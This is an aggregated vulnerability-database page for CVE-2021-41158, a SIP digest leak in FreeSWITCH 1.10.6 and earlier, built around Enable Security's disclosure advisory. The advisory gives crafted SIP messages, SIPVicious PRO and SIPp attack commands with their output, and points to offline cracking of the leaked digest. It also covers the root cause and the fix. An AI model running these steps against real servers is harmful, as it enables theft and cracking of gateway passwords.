FreeSWITCH 1.10.6 SIP Digest Leak Vulnerability

2021-10-26T00:00:00

Description

FreeSWITCH versions 1.10.6 and below suffer from a SIP digest leak vulnerability. An attacker can perform a SIP digest leak attack against FreeSWITCH and receive the challenge response of a gateway configured on the FreeSWITCH server. This is done by challenging FreeSWITCH's SIP requests with the realm set to that of the gateway, thus forcing FreeSWITCH to respond with the challenge response which is based on the password of that targeted gateway.

{"id": "1337DAY-ID-36957", "vendorId": null, "type": "zdt", "bulletinFamily": "exploit", "title": "FreeSWITCH 1.10.6 SIP Digest Leak Vulnerability", "description": "FreeSWITCH versions 1.10.6 and below suffer from a SIP digest leak vulnerability. An attacker can perform a SIP digest leak attack against FreeSWITCH and receive the challenge response of a gateway configured on the FreeSWITCH server. This is done by challenging FreeSWITCH's SIP requests with the realm set to that of the gateway, thus forcing FreeSWITCH to respond with the challenge response which is based on the password of that targeted gateway.", "published": "2021-10-26T00:00:00", "modified": "2021-10-26T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0}, "severity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "href": "https://0day.today/exploit/description/36957", "reporter": "Sandro Gauci", "references": [], "cvelist": ["CVE-2021-41158"], "immutableFields": [], "lastseen": "2022-06-27T08:20:03", "viewCount": 137, "enchantments": {"dependencies": {"references": [{"type": "alpinelinux", "idList": ["ALPINE:CVE-2021-41158"]}, {"type": "cve", "idList": ["CVE-2021-41158"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164622"]}], "rev": 4}, "score": {"value": 5.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "alpinelinux", "idList": ["ALPINE:CVE-2021-41158"]}, {"type": "cve", "idList": ["CVE-2021-41158"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164622"]}]}, "exploitation": null, "vulnersScore": 5.1}, "_state": {"dependencies": 0}, "_internal": {}, "sourceHref": "https://0day.today/exploit/36957", "sourceData": "# FreeSWITCH vulnerable to SIP digest leak for configured gateways\n\n- Fixed versions: v1.10.7\n- Enable Security Advisory: https://github.com/EnableSecurity/advisories/tree/master/ES2021-05-freeswitch-vulnerable-to-SIP-digest-leak\n- Vendor Security Advisory: https://github.com/signalwire/freeswitch/security/advisories/GHSA-3v3f-99mv-qvj4\n- Other references: CVE-2021-41158\n- Tested vulnerable versions: <= v1.10.6\n- Timeline:\n - Report date: 2021-04-22\n - Triaged: 2021-04-23\n - Fix provided for testing: 2021-08-13\n - Second fix provided for testing: 2021-09-14\n - Vendor release with fix: 2021-10-24\n - Enable Security advisory: 2021-10-25\n\n## Description\n\nAn attacker can perform a SIP digest leak attack against FreeSWITCH and receive the challenge response of a gateway configured on the FreeSWITCH server. This is done by challenging FreeSWITCH's SIP requests with the realm set to that of the gateway, thus forcing FreeSWITCH to respond with the challenge response which is based on the password of that targeted gateway.\n\nOne of the ways to perform this attack involves initiating a call to any directory number (e.g. 1002). In the default configuration, this can be done via the external SIP profile by calling `sip:[email\u00a0protected]:5080` without authentication, or via the internal SIP profile with authentication by calling `sip:[email\u00a0protected]:5060`.\n\nTo demonstrate this issue, the following external SIP profile configuration was used for the gateway `demo.sipvicious.pro`:\n\n```xml\n<gateway name=\"demo.sipvicious.pro\">\n <param name=\"username\" value=\"1000\"/>\n <param name=\"password\" value=\"1500\"/>\n</gateway>\n```\n\nThe malicious UAC initiates the attack by sending an INVITE to FreeSWITCH. In this example, extension 1001 is calling extension 1002:\n\n```\nINVITE sip:[email\u00a0protected] SIP/2.0\nVia: SIP/2.0/UDP 192.168.1.215:35273;rport;branch=z9hG4bK-UkZy2ufFodKb5r2T\nMax-Forwards: 70\nFrom: <sip:[email\u00a0protected]>;tag=t0D1TEIKQGit7Tf7\nTo: <sip:[email\u00a0protected]>\nCall-ID: Y72a9ZSUQk0zQ23P\nCSeq: 1 INVITE\nContact: <sip:[email\u00a0protected]:35273;transport=udp>\nContent-Length: 245\nContent-Type: application/sdp\n```\n\nThe call is either manually picked up by the callee, or automatically by its mailbox:\n\n```\nSIP/2.0 200 OK\nVia: SIP/2.0/UDP 192.168.1.215:35273;rport=35273;branch=z9hG4bK-UkZy2ufFodKb5r2T\nFrom: <sip:[email\u00a0protected]>;tag=t0D1TEIKQGit7Tf7\nTo: <sip:[email\u00a0protected]>;tag=983BacQc9Q9vp\nCall-ID: Y72a9ZSUQk0zQ23P\nCSeq: 1 INVITE\nContact: <sip:[email\u00a0protected]:5080;transport=udp>\nUser-Agent: FreeSWITCH-mod_sofia/1.10.7-dev+git~20210325T155256Z~67cec5c3e8~64bit\nAccept: application/sdp\nAllow: INVITE, ACK, BYE, CANCEL, OPTIONS, MESSAGE, INFO, UPDATE, REGISTER, REFER, NOTIFY\nSupported: timer, path, replaces\nAllow-Events: talk, hold, conference, refer\nContent-Type: application/sdp\nContent-Disposition: session\nContent-Length: 222\nRemote-Party-ID: \"1002\" <sip:[email\u00a0protected]>;party=calling;privacy=off;screen=no\n```\n\nOnce the callee or mailbox hangs up the call, FreeSWITCH will send a BYE request to the malicious UAC:\n\n```\nBYE sip:[email\u00a0protected]:35273;transport=udp SIP/2.0\nVia: SIP/2.0/UDP 192.168.1.215:5080;rport;branch=z9hG4bKF7XSHFKDmUN5D\nMax-Forwards: 70\nFrom: <sip:[email\u00a0protected]>;tag=983BacQc9Q9vp\nTo: <sip:[email\u00a0protected]>;tag=t0D1TEIKQGit7Tf7\nCall-ID: Y72a9ZSUQk0zQ23P\nCSeq: 34695099 BYE\nUser-Agent: FreeSWITCH-mod_sofia/1.10.7-dev+git~20210325T155256Z~67cec5c3e8~64bit\nAllow: INVITE, ACK, BYE, CANCEL, OPTIONS, MESSAGE, INFO, UPDATE, REGISTER, REFER, NOTIFY\nSupported: timer, path, replaces\nReason: Q.850;cause=16;text=\"NORMAL_CLEARING\"\nContent-Length: 0\n\n```\n\nThe malicious UAC will then challenge the BYE request by sending a specially crafted 407 response. The realm value of the `Proxy-Authenticate` header is set to the domain of the target gateway, in our case `demo.sipvicious.pro`:\n\n```\nSIP/2.0 407 Proxy Authentication Required\nVia: SIP/2.0/UDP 192.168.1.215:5080;rport;branch=z9hG4bKF7XSHFKDmUN5D\nFrom: <sip:[email\u00a0protected]>;tag=983BacQc9Q9vp\nTo: <sip:[email\u00a0protected]>;tag=t0D1TEIKQGit7Tf7\nCall-ID: Y72a9ZSUQk0zQ23P\nCSeq: 34695099 BYE\nProxy-Authenticate: Digest realm=\"demo.sipvicious.pro\",nonce=\"4XC2\",algorithm=MD5\n```\n\nFreeSWITCH will reply with the challenge response, base on the password of the gateway:\n\n```\nBYE sip:[email\u00a0protected]:35273;transport=udp SIP/2.0\nVia: SIP/2.0/UDP 192.168.1.215:5080;rport;branch=z9hG4bKggQjKa4gH4BrS\nMax-Forwards: 70\nFrom: <sip:[email\u00a0protected]>;tag=983BacQc9Q9vp\nTo: <sip:[email\u00a0protected]>;tag=t0D1TEIKQGit7Tf7\nCall-ID: Y72a9ZSUQk0zQ23P\nCSeq: 34695100 BYE\nUser-Agent: FreeSWITCH-mod_sofia/1.10.7-dev+git~20210325T155256Z~67cec5c3e8~64bit\nAllow: INVITE, ACK, BYE, CANCEL, OPTIONS, MESSAGE, INFO, UPDATE, REGISTER, REFER, NOTIFY\nSupported: timer, path, replaces\nProxy-Authorization: Digest username=\"1000\", realm=\"demo.sipvicious.pro\", \n nonce=\"4XC2\", algorithm=MD5, \n uri=\"sip:[email\u00a0protected]:35273;transport=udp\", \n response=\"10c3a9408b3a97cd6ec8bb3908f30d93\"\nReason: Q.850;cause=16;text=\"NORMAL_CLEARING\"\nContent-Length: 0\n\n```\n\nThe challenge response may then be subjected to a fast offline password bruteforce attack using tools such as hashcat and John the Ripper.\n\nThe above example consists of challenging the BYE message coming from FreeSWITCH. We identified the following additional scenarios which allow exploitation:\n\n- FreeSWITCH initiating a call to a malicious party, for example by making use of the `originate` command in `fs_cli`, where the malicious party challenges the incoming INVITE request.\n- An authenticated SIP endpoint calling another registered malicious endpoint, where the malicious endpoint challenges the incoming INVITE request.\n\n\n## Impact\n\nAbuse of this vulnerability allows attackers to potentially recover gateway passwords by performing a fast offline password cracking attack on the challenge response. \n\nDo note that the attacker does not require special network privileges, such as the ability to sniff the FreeSWITCH's network traffic, to exploit this issue. Instead, what is required for this attack to work is the ability to cause the victim server to send SIP request messages to the malicious party.\n\nAdditionally, to exploit this issue, the attacker needs to specify the correct realm which might in some cases be considered secret. However, because many gateways are actually public, this information can easily be retrieved.\n\n\n## How to reproduce the issue\n\nTo reproduce this issue, we made use of SIPVicious PRO's SIP digest leak tool as follows:\n\n```\nsipvicious sip crack digestleak udp://172.17.0.2:5060 -u1001:9999999 -e1002 \\\n --challenge-config realm:demo.sipvicious.pro\nINFO[2021-04-19 23:09:17] started digest leak tool on udp://172.17.0.2:5060\nINFO[2021-04-19 23:09:17] call picked up by sip:[email\u00a0protected]\nINFO[2021-04-19 23:09:18] received BYE, challenging that with a 407\nWARN[2021-04-19 23:09:18] digest leaked: response: 6b4f4d6c4d9a086190bd27e410cd1fe4, \\\n realm=demo.sipvicious.pro, nonce=8B05, uri=sip:[email\u00a0protected]:51518;transport=udp, \\\n method=BYE, username=1000\nINFO[2021-04-19 23:09:18] BYE received, terminating call\nWARN[2021-04-19 23:09:21] security issue detected: digest leaked\nINFO[2021-04-19 23:09:21] test complete\n- target: udp://172.17.0.2:5060\n - status: security issue, digest leaked\n results:\n N/A\n issues:\n - digestleak:\n response: 6b4f4d6c4d9a086190bd27e410cd1fe4, realm=demo.sipvicious.pro, \n nonce=8B05, uri=sip:[email\u00a0protected]:51518;transport=udp, \n method=BYE, username=1000\n```\n\nAlternatively, SIPp may be used with a modified version of the Digest leak scenario from [tomeko.net][1] as follows:\n\n```\nsipp 192.168.188.128:5080 -sf uac_digest_leak.xml -s 1002 -m 1\n```\n\nNote: in the [scenario][1] from tomeko.net, make sure to replace the `WWW-Authenticate` header with `Proxy-Authenticate`, set the correct realm (e.g. `demo.sipvicious.pro`) and set 183 responses as optional.\n\n[1]: https://tomeko.net/other/sipp/sipp_cheatsheet.php?lang=en\n\n## Solution and recommendations\n\nUpgrade to a version of FreeSWITCH that fixes this issue.\n\nOur suggestion to the FreeSWITCH developers was the following:\n\n> The vulnerability appears to be due to the code which handles challenges in `sofia_reg.c`, `sofia_reg_handle_sip_r_challenge()` which does not check if the challenge is originating from the actual gateway. The lack of these checks allows arbitrary UACs (and gateways) to challenge any request sent by FreeSWITCH with the realm of the gateway being targeted.\n\n> Our recommendation is to create an association between a SIP session for each gateway and its realm, and then a check is put in place for this association when responding to challenges.\n", "category": "web applications", "verified": true}

{"cve": [{"lastseen": "2022-03-23T19:14:38", "description": "FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.10.7, an attacker can perform a SIP digest leak attack against FreeSWITCH and receive the challenge response of a gateway configured on the FreeSWITCH server. This is done by challenging FreeSWITCH's SIP requests with the realm set to that of the gateway, thus forcing FreeSWITCH to respond with the challenge response which is based on the password of that targeted gateway. Abuse of this vulnerability allows attackers to potentially recover gateway passwords by performing a fast offline password cracking attack on the challenge response. The attacker does not require special network privileges, such as the ability to sniff the FreeSWITCH's network traffic, to exploit this issue. Instead, what is required for this attack to work is the ability to cause the victim server to send SIP request messages to the malicious party. Additionally, to exploit this issue, the attacker needs to specify the correct realm which might in some cases be considered secret. However, because many gateways are actually public, this information can easily be retrieved. The vulnerability appears to be due to the code which handles challenges in `sofia_reg.c`, `sofia_reg_handle_sip_r_challenge()` which does not check if the challenge is originating from the actual gateway. The lack of these checks allows arbitrary UACs (and gateways) to challenge any request sent by FreeSWITCH with the realm of the gateway being targeted. This issue is patched in version 10.10.7. Maintainers recommend that one should create an association between a SIP session for each gateway and its realm to make a check be put into place for this association when responding to challenges.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-26T14:15:00", "type": "cve", "title": "CVE-2021-41158", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41158"], "modified": "2021-10-28T20:57:00", "cpe": [], "id": "CVE-2021-41158", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-41158", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}], "veracode": [{"lastseen": "2022-05-18T01:14:26", "description": "FreeSWITCH is vulnerable to information disclosure. An attacker can perform a SIP digest leak attack against FreeSWITCH and receive the challenge response of a gateway configured on the FreeSWITCH server. This is done by challenging FreeSWITCH's SIP requests with the realm set to that of the gateway, thus forcing FreeSWITCH to respond with the challenge response which is based on the password of that targeted gateway. Abuse of this vulnerability allows attackers to potentially recover gateway passwords by performing a fast offline password cracking attack on the challenge response. The attacker does not require special network privileges, such as the ability to sniff the FreeSWITCH's network traffic, to exploit this issue. Instead, what is required for this attack to work is the ability to cause the victim server to send SIP request messages to the malicious party. Additionally, to exploit this issue, the attacker needs to specify the correct realm which might in some cases be considered secret. However, because many gateways are actually public, this information can easily be retrieved. The vulnerability appears to be due to the code which handles challenges in `sofia_reg.c`, `sofia_reg_handle_sip_r_challenge()` which does not check if the challenge is originating from the actual gateway. The lack of these checks allows arbitrary UACs (and gateways) to challenge any request sent by FreeSWITCH with the realm of the gateway being targeted. \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-11-05T10:27:36", "type": "veracode", "title": "Information Disclosure", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41158"], "modified": "2022-04-19T18:49:02", "id": "VERACODE:32826", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-32826/summary", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "alpinelinux": [{"lastseen": "2022-06-22T18:32:51", "description": "FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.10.7, an attacker can perform a SIP digest leak attack against FreeSWITCH and receive the challenge response of a gateway configured on the FreeSWITCH server. This is done by challenging FreeSWITCH's SIP requests with the realm set to that of the gateway, thus forcing FreeSWITCH to respond with the challenge response which is based on the password of that targeted gateway. Abuse of this vulnerability allows attackers to potentially recover gateway passwords by performing a fast offline password cracking attack on the challenge response. The attacker does not require special network privileges, such as the ability to sniff the FreeSWITCH's network traffic, to exploit this issue. Instead, what is required for this attack to work is the ability to cause the victim server to send SIP request messages to the malicious party. Additionally, to exploit this issue, the attacker needs to specify the correct realm which might in some cases be considered secret. However, because many gateways are actually public, this information can easily be retrieved. The vulnerability appears to be due to the code which handles challenges in `sofia_reg.c`, `sofia_reg_handle_sip_r_challenge()` which does not check if the challenge is originating from the actual gateway. The lack of these checks allows arbitrary UACs (and gateways) to challenge any request sent by FreeSWITCH with the realm of the gateway being targeted. This issue is patched in version 10.10.7. Maintainers recommend that one should create an association between a SIP session for each gateway and its realm to make a check be put into place for this association when responding to challenges.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-26T14:15:00", "type": "alpinelinux", "title": "CVE-2021-41158", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41158"], "modified": "2021-10-28T20:57:00", "id": "ALPINE:CVE-2021-41158", "href": "https://security.alpinelinux.org/vuln/CVE-2021-41158", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "packetstorm": [{"lastseen": "2021-10-25T17:33:06", "description": "", "cvss3": {}, "published": "2021-10-25T00:00:00", "type": "packetstorm", "title": "FreeSWITCH 1.10.6 SIP Digest Leak", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-41158"], "modified": "2021-10-25T00:00:00", "id": "PACKETSTORM:164622", "href": "https://packetstormsecurity.com/files/164622/FreeSWITCH-1.10.6-SIP-Digest-Leak.html", "sourceData": "`# FreeSWITCH vulnerable to SIP digest leak for configured gateways \n \n- Fixed versions: v1.10.7 \n- Enable Security Advisory: https://github.com/EnableSecurity/advisories/tree/master/ES2021-05-freeswitch-vulnerable-to-SIP-digest-leak \n- Vendor Security Advisory: https://github.com/signalwire/freeswitch/security/advisories/GHSA-3v3f-99mv-qvj4 \n- Other references: CVE-2021-41158 \n- Tested vulnerable versions: <= v1.10.6 \n- Timeline: \n- Report date: 2021-04-22 \n- Triaged: 2021-04-23 \n- Fix provided for testing: 2021-08-13 \n- Second fix provided for testing: 2021-09-14 \n- Vendor release with fix: 2021-10-24 \n- Enable Security advisory: 2021-10-25 \n \n## Description \n \nAn attacker can perform a SIP digest leak attack against FreeSWITCH and receive the challenge response of a gateway configured on the FreeSWITCH server. This is done by challenging FreeSWITCH's SIP requests with the realm set to that of the gateway, thus forcing FreeSWITCH to respond with the challenge response which is based on the password of that targeted gateway. \n \nOne of the ways to perform this attack involves initiating a call to any directory number (e.g. 1002). In the default configuration, this can be done via the external SIP profile by calling `sip:1002@freepbx:5080` without authentication, or via the internal SIP profile with authentication by calling `sip:1002@freepbx:5060`. \n \nTo demonstrate this issue, the following external SIP profile configuration was used for the gateway `demo.sipvicious.pro`: \n \n```xml \n<gateway name=\"demo.sipvicious.pro\"> \n<param name=\"username\" value=\"1000\"/> \n<param name=\"password\" value=\"1500\"/> \n</gateway> \n``` \n \nThe malicious UAC initiates the attack by sending an INVITE to FreeSWITCH. In this example, extension 1001 is calling extension 1002: \n \n``` \nINVITE sip:1002@192.168.1.215 SIP/2.0 \nVia: SIP/2.0/UDP 192.168.1.215:35273;rport;branch=z9hG4bK-UkZy2ufFodKb5r2T \nMax-Forwards: 70 \nFrom: <sip:1001@192.168.1.215>;tag=t0D1TEIKQGit7Tf7 \nTo: <sip:1002@192.168.1.215> \nCall-ID: Y72a9ZSUQk0zQ23P \nCSeq: 1 INVITE \nContact: <sip:1001@192.168.1.215:35273;transport=udp> \nContent-Length: 245 \nContent-Type: application/sdp \n``` \n \nThe call is either manually picked up by the callee, or automatically by its mailbox: \n \n``` \nSIP/2.0 200 OK \nVia: SIP/2.0/UDP 192.168.1.215:35273;rport=35273;branch=z9hG4bK-UkZy2ufFodKb5r2T \nFrom: <sip:1001@192.168.1.215>;tag=t0D1TEIKQGit7Tf7 \nTo: <sip:1002@192.168.1.215>;tag=983BacQc9Q9vp \nCall-ID: Y72a9ZSUQk0zQ23P \nCSeq: 1 INVITE \nContact: <sip:1002@192.168.1.215:5080;transport=udp> \nUser-Agent: FreeSWITCH-mod_sofia/1.10.7-dev+git~20210325T155256Z~67cec5c3e8~64bit \nAccept: application/sdp \nAllow: INVITE, ACK, BYE, CANCEL, OPTIONS, MESSAGE, INFO, UPDATE, REGISTER, REFER, NOTIFY \nSupported: timer, path, replaces \nAllow-Events: talk, hold, conference, refer \nContent-Type: application/sdp \nContent-Disposition: session \nContent-Length: 222 \nRemote-Party-ID: \"1002\" <sip:1002@192.168.1.215>;party=calling;privacy=off;screen=no \n``` \n \nOnce the callee or mailbox hangs up the call, FreeSWITCH will send a BYE request to the malicious UAC: \n \n``` \nBYE sip:1001@192.168.1.215:35273;transport=udp SIP/2.0 \nVia: SIP/2.0/UDP 192.168.1.215:5080;rport;branch=z9hG4bKF7XSHFKDmUN5D \nMax-Forwards: 70 \nFrom: <sip:1002@192.168.1.215>;tag=983BacQc9Q9vp \nTo: <sip:1001@192.168.1.215>;tag=t0D1TEIKQGit7Tf7 \nCall-ID: Y72a9ZSUQk0zQ23P \nCSeq: 34695099 BYE \nUser-Agent: FreeSWITCH-mod_sofia/1.10.7-dev+git~20210325T155256Z~67cec5c3e8~64bit \nAllow: INVITE, ACK, BYE, CANCEL, OPTIONS, MESSAGE, INFO, UPDATE, REGISTER, REFER, NOTIFY \nSupported: timer, path, replaces \nReason: Q.850;cause=16;text=\"NORMAL_CLEARING\" \nContent-Length: 0 \n \n``` \n \nThe malicious UAC will then challenge the BYE request by sending a specially crafted 407 response. The realm value of the `Proxy-Authenticate` header is set to the domain of the target gateway, in our case `demo.sipvicious.pro`: \n \n``` \nSIP/2.0 407 Proxy Authentication Required \nVia: SIP/2.0/UDP 192.168.1.215:5080;rport;branch=z9hG4bKF7XSHFKDmUN5D \nFrom: <sip:1002@192.168.1.215>;tag=983BacQc9Q9vp \nTo: <sip:1001@192.168.1.215>;tag=t0D1TEIKQGit7Tf7 \nCall-ID: Y72a9ZSUQk0zQ23P \nCSeq: 34695099 BYE \nProxy-Authenticate: Digest realm=\"demo.sipvicious.pro\",nonce=\"4XC2\",algorithm=MD5 \n``` \n \nFreeSWITCH will reply with the challenge response, base on the password of the gateway: \n \n``` \nBYE sip:1001@192.168.1.215:35273;transport=udp SIP/2.0 \nVia: SIP/2.0/UDP 192.168.1.215:5080;rport;branch=z9hG4bKggQjKa4gH4BrS \nMax-Forwards: 70 \nFrom: <sip:1002@192.168.1.215>;tag=983BacQc9Q9vp \nTo: <sip:1001@192.168.1.215>;tag=t0D1TEIKQGit7Tf7 \nCall-ID: Y72a9ZSUQk0zQ23P \nCSeq: 34695100 BYE \nUser-Agent: FreeSWITCH-mod_sofia/1.10.7-dev+git~20210325T155256Z~67cec5c3e8~64bit \nAllow: INVITE, ACK, BYE, CANCEL, OPTIONS, MESSAGE, INFO, UPDATE, REGISTER, REFER, NOTIFY \nSupported: timer, path, replaces \nProxy-Authorization: Digest username=\"1000\", realm=\"demo.sipvicious.pro\", \nnonce=\"4XC2\", algorithm=MD5, \nuri=\"sip:1001@192.168.1.215:35273;transport=udp\", \nresponse=\"10c3a9408b3a97cd6ec8bb3908f30d93\" \nReason: Q.850;cause=16;text=\"NORMAL_CLEARING\" \nContent-Length: 0 \n \n``` \n \nThe challenge response may then be subjected to a fast offline password bruteforce attack using tools such as hashcat and John the Ripper. \n \nThe above example consists of challenging the BYE message coming from FreeSWITCH. We identified the following additional scenarios which allow exploitation: \n \n- FreeSWITCH initiating a call to a malicious party, for example by making use of the `originate` command in `fs_cli`, where the malicious party challenges the incoming INVITE request. \n- An authenticated SIP endpoint calling another registered malicious endpoint, where the malicious endpoint challenges the incoming INVITE request. \n \n \n## Impact \n \nAbuse of this vulnerability allows attackers to potentially recover gateway passwords by performing a fast offline password cracking attack on the challenge response. \n \nDo note that the attacker does not require special network privileges, such as the ability to sniff the FreeSWITCH's network traffic, to exploit this issue. Instead, what is required for this attack to work is the ability to cause the victim server to send SIP request messages to the malicious party. \n \nAdditionally, to exploit this issue, the attacker needs to specify the correct realm which might in some cases be considered secret. However, because many gateways are actually public, this information can easily be retrieved. \n \n \n## How to reproduce the issue \n \nTo reproduce this issue, we made use of SIPVicious PRO's SIP digest leak tool as follows: \n \n``` \nsipvicious sip crack digestleak udp://172.17.0.2:5060 -u1001:9999999 -e1002 \\ \n--challenge-config realm:demo.sipvicious.pro \nINFO[2021-04-19 23:09:17] started digest leak tool on udp://172.17.0.2:5060 \nINFO[2021-04-19 23:09:17] call picked up by sip:1002@172.17.0.2 \nINFO[2021-04-19 23:09:18] received BYE, challenging that with a 407 \nWARN[2021-04-19 23:09:18] digest leaked: response: 6b4f4d6c4d9a086190bd27e410cd1fe4, \\ \nrealm=demo.sipvicious.pro, nonce=8B05, uri=sip:1001@172.17.0.1:51518;transport=udp, \\ \nmethod=BYE, username=1000 \nINFO[2021-04-19 23:09:18] BYE received, terminating call \nWARN[2021-04-19 23:09:21] security issue detected: digest leaked \nINFO[2021-04-19 23:09:21] test complete \n- target: udp://172.17.0.2:5060 \n- status: security issue, digest leaked \nresults: \nN/A \nissues: \n- digestleak: \nresponse: 6b4f4d6c4d9a086190bd27e410cd1fe4, realm=demo.sipvicious.pro, \nnonce=8B05, uri=sip:1001@172.17.0.1:51518;transport=udp, \nmethod=BYE, username=1000 \n``` \n \nAlternatively, SIPp may be used with a modified version of the Digest leak scenario from [tomeko.net][1] as follows: \n \n``` \nsipp 192.168.188.128:5080 -sf uac_digest_leak.xml -s 1002 -m 1 \n``` \n \nNote: in the [scenario][1] from tomeko.net, make sure to replace the `WWW-Authenticate` header with `Proxy-Authenticate`, set the correct realm (e.g. `demo.sipvicious.pro`) and set 183 responses as optional. \n \n[1]: https://tomeko.net/other/sipp/sipp_cheatsheet.php?lang=en \n \n## Solution and recommendations \n \nUpgrade to a version of FreeSWITCH that fixes this issue. \n \nOur suggestion to the FreeSWITCH developers was the following: \n \n> The vulnerability appears to be due to the code which handles challenges in `sofia_reg.c`, `sofia_reg_handle_sip_r_challenge()` which does not check if the challenge is originating from the actual gateway. The lack of these checks allows arbitrary UACs (and gateways) to challenge any request sent by FreeSWITCH with the realm of the gateway being targeted. \n \n> Our recommendation is to create an association between a SIP session for each gateway and its realm, and then a check is put in place for this association when responding to challenges. \n \n## About Enable Security \n \n[Enable Security](https://www.enablesecurity.com) develops offensive security tools and provides quality penetration testing to help protect your real-time communications systems against attack. \n \n## Disclaimer \n \nThe information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. \n \n## Disclosure policy \n \nThis report is subject to Enable Security's vulnerability disclosure policy which can be found at <https://github.com/EnableSecurity/Vulnerability-Disclosure-Policy>. \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/164622/ES2021-05.txt", "cvss": {"score": 0.0, "vector": "NONE"}}]}

FreeSWITCH 1.10.6 SIP Digest Leak Vulnerability

Description

Related